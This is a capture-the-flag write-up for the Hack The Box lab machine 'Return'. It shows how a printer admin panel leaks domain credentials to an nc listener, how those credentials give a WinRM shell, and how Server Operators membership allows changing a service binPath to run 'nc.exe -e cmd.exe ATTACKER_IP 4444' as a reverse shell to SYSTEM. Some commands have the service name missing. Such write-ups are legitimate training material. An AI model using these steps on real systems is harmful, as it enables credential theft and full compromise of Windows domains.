Return is a Windows domain machine exposing SMB, WinRM, and a printer administration panel.
The printer panel leaks valid domain credentials when forced to authenticate to an attacker-controlled listener.
Privilege escalation is achieved through the Server Operators group by modifying the binPath of a Windows service.
Target: return.htb
Initial vector: Printer panel credential leak
Privilege escalation: Service modification via Server Operators
Nmap:
53/tcp domain 80/tcp http (IIS) 88/tcp kerberos 135/tcp msrpc 139/tcp netbios-ssn 389/tcp ldap 445/tcp smb 5985/tcp winrm 10000/tcp webmin
Port 80 hosts the “HTB Printer Admin Panel”. SMB enumeration reveals no anonymous shares:
$ crackmapexec smb 10.129.65.16 $ smbclient -L 10.129.65.16 -N $ smbmap -H 10.129.65.16
The printer panel allows configuring a network printer. If we point the printer to our attacker machine, it attempts authentication and leaks credentials.
Start a listener on the attacker:
$ nc -nlvp 389
Trigger the printer connection from the web panel. Captured credentials:
svc-printer : 1edFg43012!!
Validate with WinRM:
$ crackmapexec winrm 10.129.65.16 -u svc-printer -p '1edFg43012!!' -> Pwn3d!
Obtain a shell:
$ evil-winrm -i 10.129.65.16 -u svc-printer -p '1edFg43012!!'
Check privileges:
whoami /priv net user svc-printer
The account is a member of:
Remote Management Users Server Operators
Members of Server Operators can modify service configurations, including binPath, which allows arbitrary command execution as SYSTEM.
Upload nc.exe to the target:
PS> upload nc.exe C:\Windows\Temp\nc.exe
Find a writable service (trial and error).
Modify its binPath:
sc.exe configbinPath= "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
Restart the service:
sc.exe stopsc.exe start
Listener on attacker:
$ nc -nlvp 4444 -> SYSTEM shell
Return demonstrates a classic Windows misconfiguration: a printer panel leaking domain credentials, combined with
the powerful Server Operators group.
By modifying a service’s binPath, full SYSTEM compromise is achieved.